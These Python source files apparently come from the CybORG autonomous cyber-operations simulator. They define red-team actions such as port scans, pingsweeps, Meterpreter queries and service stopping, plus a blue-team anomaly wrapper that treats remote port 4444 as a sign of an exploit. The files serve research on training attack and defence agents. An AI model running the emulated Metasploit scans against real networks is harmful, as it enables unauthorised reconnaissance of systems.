from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.session import Session, RedAbstractSession
from csle_cyborg.simulator.state import State


class StopService(ConcreteAction):
    def __init__(self, agent: str, session: int, target_session: int, service: str):
        super().__init__(session, agent)
        self.service = service
        self.target_session = target_session

    def sim_execute(self, state: State):
        # check that both sessions exist
        if self.session not in state.sessions[self.agent] or self.target_session not in state.sessions[self.agent]:
            return Observation(False)

        # check that both sessions are active
        parent_session: RedAbstractSession = state.sessions[self.agent][self.session]
        client_session: Session = state.sessions[self.agent][self.target_session]
        if not parent_session.active or not client_session.active:
            return Observation(False)

        # get target host
        target_host: Host = state.hosts[client_session.host]
        # find chosen service on host
        if self.service not in target_host.services:
            return Observation(False)
        service = target_host.services[self.service]
        state.stop_service(target_host.hostname, self.service)
        obs = Observation(True)

        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.internal_enumeration_folder.host_info_enumeration_folder.host_info_enumeration import HostInfoEnumeration
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.shared.observation import Observation


class SystemInfo(HostInfoEnumeration):
    def __init__(self, session, agent):
        super().__init__(session, agent)

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs

        if state.sessions[self.agent][self.session].active:
            host = state.sessions[self.agent][self.session].host
            if host.os_type == OperatingSystemType.WINDOWS:
                obs.set_success(True)
                obs.add_system_info(**(host.get_state()))
            else:
                obs.add_system_info(os_type=host.os_type)
                obs.set_success(False)
        else:
            obs.set_success(False)
        return obs



# Copyright DST Group. Licensed under the MIT license.
import re
from ipaddress import IPv4Network

from csle_cyborg.shared.actions.msf_actions_folder.meterpreter_actions_folder.meterpreter_action import MeterpreterAction
from csle_cyborg.shared.enums import SessionType
from csle_cyborg.shared.observation import Observation


class MeterpreterIPConfig(MeterpreterAction):
    def __init__(self, session, agent, target_session):
        super().__init__(session, agent, target_session)

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent] or state.sessions[self.agent][self.session].session_type != SessionType.MSF_SERVER:
            return obs
        if self.meterpreter_session not in state.sessions[self.agent] or state.sessions[self.agent][self.meterpreter_session].session_type != SessionType.METERPRETER:
            return obs
        if state.sessions[self.agent][self.session].active and state.sessions[self.agent][self.meterpreter_session].active:
            host = state.hosts[state.sessions[self.agent][self.meterpreter_session].host]
            obs.set_success(True)
            for interface in host.interfaces:
                obs.add_interface_info(hostid=str(self.meterpreter_session), **(interface.get_state()))
        return obs

    def emu_execute(self, session_handler):
        obs = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            obs.set_success(False)
            return obs

        output = session_handler.execute_shell_action(action='ipconfig', session=str(self.meterpreter_session)).replace('\r','')
        obs.add_raw_obs(output)

        """Expected output:
        Interface  1
        ============
        Name         : lo
        Hardware MAC : 00:00:00:00:00:00
        MTU          : 65536
        Flags        : UP,LOOPBACK
        IPv4 Address : 127.0.0.1
        IPv4 Netmask : 255.0.0.0
        IPv6 Address : ::1
        IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
        
        
        Interface  2
        ============
        Name         : eth0
        Hardware MAC : 06:ec:36:d0:fb:7e
        MTU          : 9001
        Flags        : UP,BROADCAST,MULTICAST
        IPv4 Address : 10.0.1.90
        IPv4 Netmask : 255.255.255.240
        IPv6 Address : fe80::4ec:36ff:fed0:fb7e
        IPv6 Netmask : ffff:ffff:ffff:ffff::
        """
        obs.set_success(False)
        # session_handler._log_debug(output)
        try:
            for interface in output.split('============\n'):
                split = re.sub(' +', ' ', interface).split('\n')
                name = None
                mac = None
                ip = None
                mask = None
                for element in split:
                    if 'Name' in element:
                        name = element.split(': ')[1]
                    if 'Hardware MAC' in element:
                        mac = element.split(': ')[1]
                    if 'IPv4 Address' in element:
                        ip = element.split(': ')[1]
                    if 'IPv4 Netmask' in element:
                        mask = element.split(': ')[1]
                if mask is not None and ip is not None:
                    subnet = IPv4Network(f'{ip}/{mask}', False)
                else:
                    subnet = None
                if ip is not None:
                    obs.add_interface_info(hostid=str(self.meterpreter_session), interface_name=name, ip_address=ip, subnet=subnet)
                    obs.set_success(True)
        except IndexError as ex:
            session_handler._log_debug(output)
            raise ex

        return obs




from csle_cyborg.main import Main
import inspect


# Set up CybORG
print("Setup")
path = str(inspect.getfile(Main))
path = path[:-7] + '/Shared/Scenarios/Scenario1KeyboardBlue.yaml' # Change this to pick your agents
cyborg = Main(path, 'sim')

for i in range(1):
    print(f"Game: {i}")
    cyborg.start(1000)
    cyborg.reset()




# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address

from csle_cyborg.shared.actions.msf_actions_folder.msf_action import lo_subnet, lo
from csle_cyborg.shared.actions.msf_actions_folder.msf_scanner_folder.msf_scanner import MSFScanner
from csle_cyborg.shared.enums import SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State

# msf module is auxiliary/scanner/portscan/tcp
class MSFPortscan(MSFScanner):
    def __init__(self, ip_address: IPv4Address, session: int, agent: str):
        super().__init__(session, agent)
        self.ip_address = ip_address

    def sim_execute(self, state: State):
        obs = Observation()
        if self.session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        from_host = state.sessions['Red'][self.session].host
        session = state.sessions['Red'][self.session]

        if str(self.ip_address) == "127.0.0.1":
            target_host = state.hosts[from_host]
        else:
            target_host = state.hosts[state.ip_addresses[self.ip_address]]

        if session.session_type != SessionType.MSF_SERVER or not session.active:
            obs.set_success(False)
            return obs
        target_subnet = None
        if self.ip_address == lo:
            target_subnet = lo_subnet
            from_interface = [i for i in target_host.interfaces if i.ip_address == lo][0]
        else:
            for subnet in state.subnets.values():
                if self.ip_address in subnet.ip_addresses:
                    target_subnet = subnet.cidr
                    break

            session, from_interface = self.get_local_source_interface(local_session=session, remote_address=self.ip_address, state=state)

        if from_interface is None:
            obs.set_success(False)
            return obs



        obs.set_success(True)

        for process in target_host.processes:
            for conn in process.connections:
                if 'local_port' in conn and conn['local_port'] in [21, 22, 80, 111, 135, 139, 443, 445] + list(range(8000, 8100)):
                    # internal so avoids nacls
                    if self.ip_address == IPv4Address("127.0.0.1"):
                        if (conn['local_address'] == IPv4Address("127.0.0.1") or conn['local_address'] == IPv4Address("0.0.0.0")) and 'remote_address' not in conn:
                            obs.add_process(hostid=str(self.ip_address), local_port=conn["local_port"], local_address=self.ip_address)
                    elif ((conn['local_address'] == IPv4Address("0.0.0.0") or conn['local_address'] == self.ip_address) and 'remote_address' not in conn) and self.test_nacl(port=conn['local_port'], target_subnet=state.subnets[target_subnet], originating_subnet=state.subnets[from_interface.subnet]):
                        obs.add_process(hostid=str(self.ip_address), local_port=conn["local_port"], local_address=self.ip_address)
        return obs

    def emu_execute(self, session_handler) -> Observation:
        result = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            result.set_success(False)
            return result

        output = session_handler.execute_module(mtype='auxiliary', mname='scanner/portscan/tcp',
                                                opts={'RHOSTS': str(self.ip_address),
                                                      'PORTS': '21,22,80,111,135,139,443,445,8000,8009,8010,8020,8027,8080'})
        # session_handler._log_debug(output)
        result.add_raw_obs(output)
        try:
            for values in output.split('\n'):
                if values.find('TCP OPEN') != -1:
                    # new port is open
                    port = values.split(f"{self.ip_address}:")[-1].split(" ")[0]
                    result.add_process(hostid=str(self.ip_address), local_port=int(port), local_address=self.ip_address)
                    result.set_success(True)
        except Exception as e:
            session_handler._log_debug(
                f"Error occured in MSFPortscan output parsing with output: {output} and error {e}")
            raise e
        """" EXAMPLE VALUE OF RESULT
        'VERBOSE => false
        SSL = > false
        SSLVersion = > Auto
        SSLVerifyMode = > PEER
        ConnectTimeout = > 10
        TCP::max_send_size = > 0
        TCP::send_delay = > 0
        THREADS = > 1
        ShowProgress = > true
        ShowProgressPercent = > 10
        PORTS = > 1 - 10000
        TIMEOUT = > 1000
        CONCURRENCY = > 10
        DELAY = > 0
        JITTER = > 0
        RHOSTS = > 127.0.0.1
        [+] 127.0.0.1: - 127.0.0.1: 22 - TCP OPEN
        [+] 127.0.0.1: - 127.0.0.1: 5432 - TCP OPEN
        [*] 127.0.0.1: - Scanned 1 of 1 hosts(100 % complete)
        [*] Auxiliary module execution completed'
        """
        return result

    def __str__(self):
        return super(MSFPortscan, self).__str__() + f", Target: {self.ip_address}"



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.session import SessionType
from csle_cyborg.shared.enums import QueryType
from .velociraptor_action import VelociraptorAction


class GetFileInfo(VelociraptorAction):

    def __init__(self, session: int, agent: str):
        super().__init__(session=session,
                         query_type=QueryType.ASYNC,
                         agent=agent)
        self.agent = agent

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.VELOCIRAPTOR_CLIENT:
            return obs

        obs.set_success(True)

        users = {}

        for file in session.host.files:
            try:
                user = file.user.username
            except Exception:
                pass

            group = file.group
            if user not in users.keys():
                users[user] = [group]
            elif group not in users[user]:
                users[user].append(group)

            obs.add_file_info(
                hostid="0",
                name=file.name,
                path=file.path,
                group=file.group,
                group_permissions=file.group_permissions,
                user=file.user.username,
                user_permissions=file.user_permissionss,
                default_permissions=file.default_permissions,
                file_type=file.file_type,
                version=file.version,
                vendor=file.vendor,
                last_modified_time=file.last_modified_time
            )

        for user, groups in users.items():
            for group in groups:
                obs.add_user_info(hostid="0", username=user, group_name=group)

        return obs



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address
from csle_cyborg.shared.actions.shell_actions_folder.network_scan_folder.network_scan import NetworkScan
from csle_cyborg.shared.enums import FileType
from csle_cyborg.shared.observation import Observation


class NmapScan(NetworkScan):
    def __init__(self, session, agent, subnet):
        super().__init__(session, agent, subnet)

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs

        subnet = state.subnets[self.subnet]
        from_host = state.sessions[self.agent][self.session].host

        if not state.sessions[self.agent][self.session].active:
            obs.set_success(False)
            return obs

        good = False
        for file in from_host.files:
            if file.file_type == FileType.NMAP:
                if file.check_executable(state.sessions[self.agent][self.session].user):
                    good = True
                    break

        if not good:
            obs.set_success(False)
            return obs

        good = False
        for interface in from_host.interfaces:
            if self.subnet == interface.subnet:
                good = True
                break

        if not good:
            obs.set_success(False)
            return obs

        for ip_address in subnet.ip_addresses:
            if state.ip_addresses[ip_address].respond_to_ping:
                obs.add_interface_info(hostid=ip_address, ip_address=ip_address, subnet=self.subnet)
                obs.set_success(True)
                # iterate through processes to find ports listening on this or all interfaces
            for process in state.ip_addresses[ip_address].processes:
                obs.set_success(True)
                for conn in process.connections:
                    if conn['local_address'] == IPv4Address("0.0.0.0") or (conn['local_address'] in self.subnet.hosts() and 'remote_address' not in conn):
                        obs.add_process(hostid=ip_address, local_address=ip_address, local_port=conn['local_port'], app_protocol=conn['Application Protocol'], status='open')

        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.session_action import SessionAction


class LocalShellEcho(SessionAction):

    def __init__(self, session: int, echo_cmd: str = "Hello, World!"):
        super().__init__(session)
        self.cmd = echo_cmd

    def emu_execute(self, session_handler, *args, **kwargs):
        cmd = f"echo {self.cmd}"
        output = session_handler.execute(cmd)
        obs = Observation()
        obs.set_success(True)
        obs.add_raw_obs(output)
        return obs



from csle_cyborg.main import Main
import inspect
from csle_cyborg.agents.simple_agents.test_agent import TestAgent
from csle_cyborg.agents.wrappers.fixed_flat_wrapper import FixedFlatWrapper
from csle_cyborg.agents.wrappers.int_list_to_action import IntListToActionWrapper
from csle_cyborg.agents.wrappers.open_ai_gym_wrapper import OpenAIGymWrapper

MAX_STEPS_PER_GAME = 20
MAX_EPS = 100

def run_training_example(scenario):
    print("Setup")
    path = str(inspect.getfile(Main))
    path = path[:-7] + f'/Shared/Scenarios/{scenario}.yaml'

    agent_name = 'Red'
    cyborg = OpenAIGymWrapper(agent_name=agent_name, env=IntListToActionWrapper(FixedFlatWrapper(Main(path, 'sim'))))

    observation = cyborg.reset(agent=agent_name)
    action_space = cyborg.get_action_space(agent_name)
    print(f"Observation size {len(observation)}, Action Size {action_space}")
    action_count = 0
    agent = TestAgent()
    for i in range(MAX_EPS):  # laying multiple games
        # print(f"\rTraining Game: {i}", end='', flush=True)
        reward = 0
        for j in range(MAX_STEPS_PER_GAME):  # step in 1 game
            action = agent.get_action(observation, action_space)
            next_observation, r, done, info = cyborg.step(action=action)
            action_space = info.get('action_space')
            reward += r

            agent.train(observation)  # training the agent
            observation = next_observation
            if done or j == MAX_STEPS_PER_GAME - 1:
                # print(f"Training reward: {reward}")
                break
        observation = cyborg.reset(agent=agent_name)
        agent.end_episode()

if __name__ == "__main__":
    run_training_example('Scenario1')



from copy import deepcopy
from prettytable import PrettyTable
import numpy as np

from csle_cyborg.shared.results import Results
from csle_cyborg.agents.wrappers.base_wrapper import BaseWrapper
from csle_cyborg.agents.wrappers.true_table_wrapper import TrueTableWrapper


class BlueTableWrapper(BaseWrapper):
    def __init__(self, env=None, agent=None, output_mode='table'):
        super().__init__(env, agent)
        self.env = TrueTableWrapper(env=env, agent=agent)
        self.agent = agent

        self.baseline = None
        self.output_mode = output_mode
        self.blue_info = {}

    def reset(self, agent='Blue'):
        result = self.env.reset(agent)
        obs = result.observation
        if agent == 'Blue':
            self._process_initial_obs(obs)
            obs = self.observation_change(obs, baseline=True)
        result.observation = obs
        return result

    def step(self, agent=None, action=None) -> Results:
        result = self.env.step(agent, action)
        obs = result.observation
        if agent == 'Blue':
            obs = self.observation_change(obs)
        result.observation = obs
        result.action_space = self.action_space_change(result.action_space)
        return result

    def get_table(self, output_mode='blue_table'):
        if output_mode == 'blue_table':
            return self._create_blue_table(success=None)
        elif output_mode == 'true_table':
            return self.env.get_table()

    def observation_change(self, observation, baseline=False):
        obs = observation if type(observation) == dict else observation.data
        obs = deepcopy(observation)
        success = obs['success']

        self._process_last_action()
        anomaly_obs = self._detect_anomalies(obs) if not baseline else obs
        del obs['success']
        # TODO check what info is for baseline
        info = self._process_anomalies(anomaly_obs)
        if baseline:
            for host in info:
                info[host][-2] = 'None'
                info[host][-1] = 'No'
                self.blue_info[host][-1] = 'No'

        self.info = info

        if self.output_mode == 'table':
            return self._create_blue_table(success)
        elif self.output_mode == 'anomaly':
            anomaly_obs['success'] = success
            return anomaly_obs
        elif self.output_mode == 'raw':
            return observation
        elif self.output_mode == 'vector':
            return self._create_vector(success)
        else:
            raise NotImplementedError('Invalid output_mode for BlueTableWrapper')

    def _process_initial_obs(self, obs):
        obs = obs.copy()
        self.baseline = obs
        del self.baseline['success']
        for hostid in obs:
            if hostid == 'success':
                continue
            host = obs[hostid]
            interface = host['Interface'][0]
            subnet = interface['Subnet']
            ip = str(interface['IP Address'])
            hostname = host['System info']['Hostname']
            self.blue_info[hostname] = [str(subnet), str(ip), hostname, 'None', 'No']
        return self.blue_info

    def _process_last_action(self):
        action = self.get_last_action(agent='Blue')
        if action is not None:
            name = action.__class__.__name__
            hostname = action.get_params()['hostname'] if name in ('Restore', 'Remove') else None

            if name == 'Restore':
                self.blue_info[hostname][-1] = 'No'
            elif name == 'Remove':
                compromised = self.blue_info[hostname][-1]
                if compromised != 'No':
                    self.blue_info[hostname][-1] = 'Unknown'

    def _detect_anomalies(self, obs):
        if self.baseline is None:
            raise TypeError(
                'BlueTableWrapper was unable to establish baseline. This usually means the environment was not reset before calling the step method.')

        anomaly_dict = {}

        for hostid, host in obs.items():
            if hostid == 'success':
                continue

            host_baseline = self.baseline[hostid]
            if host == host_baseline:
                continue

            host_anomalies = {}
            if 'Files' in host:
                baseline_files = host_baseline.get('Files', [])
                anomalous_files = []
                for f in host['Files']:
                    if f not in baseline_files:
                        anomalous_files.append(f)
                if anomalous_files:
                    host_anomalies['Files'] = anomalous_files

            if 'Processes' in host:
                baseline_processes = host_baseline.get('Processes', [])
                anomalous_processes = []
                for p in host['Processes']:
                    if p not in baseline_processes:
                        anomalous_processes.append(p)
                if anomalous_processes:
                    host_anomalies['Processes'] = anomalous_processes

            if host_anomalies:
                anomaly_dict[hostid] = host_anomalies

        return anomaly_dict

    def _process_anomalies(self, anomaly_dict):
        info = deepcopy(self.blue_info)
        for hostid, host_anomalies in anomaly_dict.items():
            assert len(host_anomalies) > 0
            if 'Processes' in host_anomalies:
                connection_type = self._interpret_connections(host_anomalies['Processes'])
                info[hostid][-2] = connection_type
                if connection_type == 'Exploit':
                    info[hostid][-1] = 'User'
                    self.blue_info[hostid][-1] = 'User'
            if 'Files' in host_anomalies:
                malware = [f['Density'] >= 0.9 for f in host_anomalies['Files']]
                if any(malware):
                    info[hostid][-1] = 'Privileged'
                    self.blue_info[hostid][-1] = 'Privileged'

        return info

    def _interpret_connections(self, activity: list):
        num_connections = len(activity)

        ports = set([item['Connections'][0]['local_port'] \
                     for item in activity if 'Connections' in item])
        port_focus = len(ports)

        remote_ports = set([item['Connections'][0].get('remote_port') \
                            for item in activity if 'Connections' in item])
        if None in remote_ports:
            remote_ports.remove(None)

        if num_connections >= 3 and port_focus >= 3:
            anomaly = 'Scan'
        elif 4444 in remote_ports:
            anomaly = 'Exploit'
        elif num_connections >= 3 and port_focus == 1:
            anomaly = 'Exploit'
        elif 'Service Name' in activity[0]:
            anomaly = 'None'
        else:
            anomaly = 'Scan'

        return anomaly

    # def _malware_analysis(self,obs,hostname):
    # anomaly_dict = {hostname: {'Files': []}}
    # if hostname in obs:
    # if 'Files' in obs[hostname]:
    # files = obs[hostname]['Files']
    # else:
    # return anomaly_dict
    # else:
    # return anomaly_dict

    # for f in files:
    # if f['Density'] >= 0.9:
    # anomaly_dict[hostname]['Files'].append(f)

    # return anomaly_dict

    def _create_blue_table(self, success):
        table = PrettyTable([
            'Subnet',
            'IP Address',
            'Hostname',
            'Activity',
            'Compromised'
        ])
        for hostid in self.info:
            table.add_row(self.info[hostid])

        table.sortby = 'Hostname'
        table.success = success
        return table

    def _create_vector(self, success):
        table = self._create_blue_table(success)._rows

        proto_vector = []
        for row in table:
            # Activity
            activity = row[3]
            if activity == 'None':
                value = [0, 0]
            elif activity == 'Scan':
                value = [1, 0]
            elif activity == 'Exploit':
                value = [1, 1]
            else:
                raise ValueError('Table had invalid Access Level')
            proto_vector.extend(value)

            # Compromised
            compromised = row[4]
            if compromised == 'No':
                value = [0, 0]
            elif compromised == 'Unknown':
                value = [1, 0]
            elif compromised == 'User':
                value = [0, 1]
            elif compromised == 'Privileged':
                value = [1, 1]
            else:
                raise ValueError('Table had invalid Access Level')
            proto_vector.extend(value)

        return np.array(proto_vector)

    def get_attr(self, attribute: str):
        return self.env.get_attr(attribute)

    def get_observation(self, agent: str):
        if agent == 'Blue' and self.output_mode == 'table':
            output = self.get_table()
        else:
            output = self.get_attr('get_observation')(agent)

        return output

    def get_agent_state(self, agent: str):
        return self.get_attr('get_agent_state')(agent)

    def get_action_space(self, agent):
        return self.env.get_action_space(agent)

    def get_last_action(self, agent):
        return self.get_attr('get_last_action')(agent)

    def get_ip_map(self):
        return self.get_attr('get_ip_map')()

    def get_rewards(self):
        return self.get_attr('get_rewards')()



from ipaddress import IPv4Network

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import lo_subnet, lo
from csle_cyborg.simulator.state import State


class Pingsweep(ConcreteAction):
    """
    Concrete action that simulates a pingsweep, returning a list of active ip addresses on a subnet.
    """
    def __init__(self, session: int,agent: str,target_session: int, subnet: IPv4Network):
        super().__init__(session,agent)
        self.target_session = target_session
        self.subnet = subnet

    def sim_execute(self, state: State) -> Observation:
        self.state = state
        """
        Executes a pingsweep in the simulator.
        """
        obs = Observation()

        # Check the session running the code exists and is active.
        if self.session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs
        from_host = state.sessions[self.agent][self.session].host
        session = state.sessions[self.agent][self.session]
        if not session.active:
            obs.set_success(False)
            return obs

        # Check the target session exists and is active.
        if self.target_session in state.sessions[self.agent]:
            target_session = state.sessions[self.agent][self.target_session]
        else:
            obs.set_success(False)
            return obs
        if not target_session.active:
            obs.set_success(False)
            return obs

        # Collect ip addresses
        if self.subnet == lo_subnet:
            # Loopback address triviality
            obs.set_success(True)
            obs.add_interface_info(hostid=str(lo_subnet), subnet=lo_subnet, ip_address=lo)
        else:
            # Check NACL rules allow subnet to be scanned and ICMP is not banned.
            available_ports = self.check_routable([state.subnets[i.subnet] for i in state.hosts[from_host].interfaces if i.subnet != lo_subnet], [state.subnets[self.subnet]])
            if 'ICMP' not in available_ports and 'all' not in available_ports:
                obs.set_success(False)
                return obs
            # Return ip addresses.
            target_hosts = []
            for host in state.subnets[self.subnet].ip_addresses:
                obs.set_success(True)
                target_hosts.append(state.ip_addresses[host])
                obs.add_interface_info(hostid=str(host), ip_address=host, subnet=self.subnet)

        return obs



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address, IPv4Network
from csle_cyborg.simulator.entity import Entity


class Interface(Entity):
    def __init__(self, name: str = None, ip_address: str = None, subnet: str = None):
        super().__init__()
        self.name = name
        self.ip_address = IPv4Address(ip_address)
        # subnet replaced with Subnet object during state initialisation
        if type(subnet) is str:
            subnet = IPv4Network(subnet)
        self.subnet = subnet

    def get_state(self):
        return {"interface_name": self.name, "ip_address": self.ip_address, "subnet": str(self.subnet)}



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action


class GameAction(Action):
    """Abstract class for a game level action.

    A game action is one that operates within the context of a single
    scenario/game instance but outside of a single agent.

    Examples would be:
    - creating a new agent
    - terminating a game
    - listing available agents in a game
    """

    def emu_execute(self, game_controller, *args, **kwargs) -> Observation:
        raise NotImplementedError



from random import choice

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.actions.concrete_actions.stop_service import StopService
from csle_cyborg.simulator.state import State


class Impact(Action):
    def __init__(self, session: int, agent: str, hostname: str):
        super().__init__()
        self.agent = agent
        self.session = session
        self.hostname = hostname

    def sim_execute(self, state: State) -> Observation:
        # find session on the chosen host
        sessions = [s for s in state.sessions[self.agent].values() if s.host == self.hostname]
        if len(sessions) == 0:
            # no valid session could be found on chosen host
            return Observation(success=False)
        # find if any session are already SYSTEM or root
        min_level = 0
        session = None
        for s in sessions:
            # else find if session is Admin or sudo
            if s.username == 'root' or s.username == 'SYSTEM':
                session = s.ident
                obs = Observation(success=True)
                obs.add_session_info(hostid=self.hostname, **s.get_state())
                break
        # else use random session
        if session is None:
            session = choice(sessions).ident

        if state.sessions[self.agent][self.session].ot_service is not None:
            ot_service = state.sessions[self.agent][self.session].ot_service
            # stop the ot service if known else we will just return a failure
            sub_action = StopService(agent=self.agent, session=self.session, service=ot_service, target_session=session)
            obs = sub_action.sim_execute(state)
        else:
            obs = Observation(success=False)

        return obs

    def __str__(self):
        return f"{self.__class__.__name__} {self.hostname}"



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.game_actions.game_action import GameAction


class CreateAgent(GameAction):
    """Create a new agent on Team server for given game. """

    def __init__(self, agent_name: str):
        """
        Parameters
        ----------
        agent_name : str
            the name of agent in the scenario file
        """
        super().__init__()
        self.agent_name = agent_name

    def emu_execute(self, game_controller, *args, **kwargs) -> Observation:
        return game_controller.add_agent(self.agent_name)

    def __str__(self):
        return (f"{self.__class__.__name__}: "
                f"Agent Name:{self.agent_name}")



# Copyright DST Group. Licensed under the MIT license.

import os
import sys
from configparser import ConfigParser

from csle_cyborg.shared.logger import CybORGLogger
from csle_cyborg.main import Main as ch


class CybORGConfig:

    def __init__(self, config: ConfigParser, test: bool = False):
        """
        Parameters
        ----------
        config : ConfigParser
            the configuration object
        test : bool, optional
            if true uses test configuration (default=False)
        """
        self.config = config
        self.test = test

    @staticmethod
    def load_and_setup_logger(config_file_path: str = None,
                              test: bool = False):
        """Load configuration from file, handling case of invalid
        configuration and also setup logger.

        Parameters
        ----------
        config_file_path : str, optional
            path to configuration file, if None will use default
            (default=None)
        test : bool, optional
            if true uses test configuration (default=False)

        Returns
        -------
        CybORGConfig
            loaded configuration object
        """
        cyborg_config = CybORGConfig.load(config_file_path, test)
        CybORGLogger.setup(cyborg_config)
        return cyborg_config

    @staticmethod
    def load(config_file_path: str = None, test: bool = False):
        """Load configuration from file, handling case of invalid configuration.

        Parametersy
        ----------
        config_file_path : str
            path to configuration file, if None will use default
        test : bool, optional
            if true uses test configuration (default=False)

        Returns
        -------
        CybORGConfig
            loaded configuration object
        """
        if config_file_path is None:
            config_file_path = ch.DEFAULT_CONFIG_FILE_PATH

        if not ch.config_file_valid(config_file_path, ch.SECTION_MAP):
            # Interactively create a config file
            config_gui = ch.ConfigHelperGUI()
            config_valid, config_file_path = config_gui.run_helper_gui()
            if not config_valid:
                print("Can't run CybORG. Please create config file "
                      "and/or check paths and permissions.")
                sys.exit(-1)
        config_parse = ConfigParser()
        config_parse.read(config_file_path)
        return CybORGConfig(config_parse, test)

    def get_property(self, section, property_name):
        if property_name not in self.config[section]:
            raise AttributeError(f"Config missing property '{property_name}'"
                                 "in section '{section}'")
        return self.config[section][property_name]

    @property
    def cyborg_base_dir(self):
        return self.get_property(ch.DIRS, ch.CYBORG_BASE_DIR)

    @property
    def logger_name(self):
        return self.get_property(ch.LOGGING, ch.LOGGER_NAME)

    @property
    def logger_file_name(self):
        return self.logger_name + f"-{os.getpid()}" + ".txt"

    @property
    def log_to_file(self):
        return self.get_property(ch.LOGGING, ch.LOG_FILE)

    @property
    def log_dir_path(self):
        return self.get_property(ch.LOGGING, ch.LOG_DIR_PATH)

    @property
    def default_console_log_level(self):
        return self.get_property(ch.LOGGING, ch.DEFAULT_CONSOLE_LOG_LEVEL)

    @property
    def default_file_log_level(self):
        return self.get_property(ch.LOGGING, ch.DEFAULT_FILE_LOG_LEVEL)

    @property
    def logging_format(self):
        return ("%(asctime)-13s [ %(process)-6d | %(threadName)-30s]"
                " (%(levelname)-8s) ==> %(message)s")

    @property
    def logging_date_format(self):
        return "%m-%d %H:%M:%S"

    def __repr__(self):
        output = f"{self.__class__}:"
        s = "    "
        for section in self.config.sections():
            output += f"\n{s}{section}:"
            for var_name, var_val in self.config[section].items():
                output += f"\n{s}{s}{var_name}: {var_val}"
        return output



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address

from csle_cyborg.shared.actions.msf_actions_folder.remote_code_execution_folder.remote_code_execution import RemoteCodeExecution


class PSExec(RemoteCodeExecution):
    def __init__(self, session: int, target_ip_address:IPv4Address):
        super().__init__()

    def sim_execute(self, state):
        pass



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.session_action import SessionAction


class ShellAction(SessionAction):
    """Abstract class for a shell action.

    A session action is one that operates within the context of a single
    scenario/game instance in a single shell session.

    Parameters
    ----------
    session : int
        the id of the session to perform action in
    agent : str, optional
        the id of the agent performing the action (default=None)
    """

    def __init__(self, session: int, agent: str = None):
        super().__init__(session)
        self.agent = agent



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.enums import QueryType
from .host_monitoring_action import HostMonitoringAction


class VelociraptorAction(HostMonitoringAction):

    def __init__(self,
                 session: int,
                 agent: str,
                 query_type: QueryType,
                 hostname: str = None,
                 poll_alerts: bool = True):
        super().__init__(session=session)
        self.agent = agent
        self.hostname = hostname
        self.parameters = {'agentid': agent}
        self.query_type = query_type
        self.query = ''
        self.source_query = ''
        self.poll_alerts = poll_alerts

    def emu_execute(self,
                    session_handler,
                    *args,
                    **kwargs) -> Observation:
        """Execute and action in emulator environment

        Parameters
        ----------
        session_handler : SessionHandler
           session handler object for game session of action (i.e. that
           matches session_id)

        Returns
        -------
        Observation
            Result of performing action
        """
        vel_controller = session_handler.controller

        if self.hostname is None:
            client_id = None
        else:
            client_id = vel_controller.get_client_id_for_hostname(
                self.hostname
            )

        self.query = self.update_params(self.query, client_id)
        self.source_query = self.update_params(
            #            self.source_query, session_handler.controller
            self.source_query, client_id
        )
        results = vel_controller.execute_vql_query(
            query_name=self.name,
            query=self.query,
        )

        self.debug(f"results={results}")

        obs = self.parse(results, client_id)

        if self.poll_alerts:
            obs = vel_controller.get_latest_alerts(obs)

        return obs

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation"""
        raise NotImplementedError

    def update_params(self, query: str, client_id: str):
        if '<agent_name>' in query:
            query = query.replace('<agent_name>', self.agent)
        if '<host_id>' in query:
            query = query.replace('<host_id>', client_id)
        if '<process>' in query:
            query = query.replace('<process>', self.process)
        if '<process_name>' in query:
            query = query.replace('<process_name>', self.process_name)
        if '<username>' in query:
            query = query.replace('<username>', self.username)
        if '<agentid>' in query:
            query = query.replace('<agent_id>', self.agent)
        if '<artifactname>' in query:
            if 'artifactname' in self.parameters:
                artifact = self.parameters['artifactname']
                query = query.replace('<artifactname>', artifact)
            else:
                query = query.replace("artifactname = '<artifactname>', ", "")
        if '<tag>' in query:
            if 'tag' in self.parameters:
                query = query.replace('<tag>', self.parameters['tag'])
            else:
                query = query.replace("tag = '<tag>'", "")

        return query

    def __str__(self):
        return super(VelociraptorAction, self).__str__() + f", {self.hostname}"



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.msf_actions_folder.msf_action import MSFAction


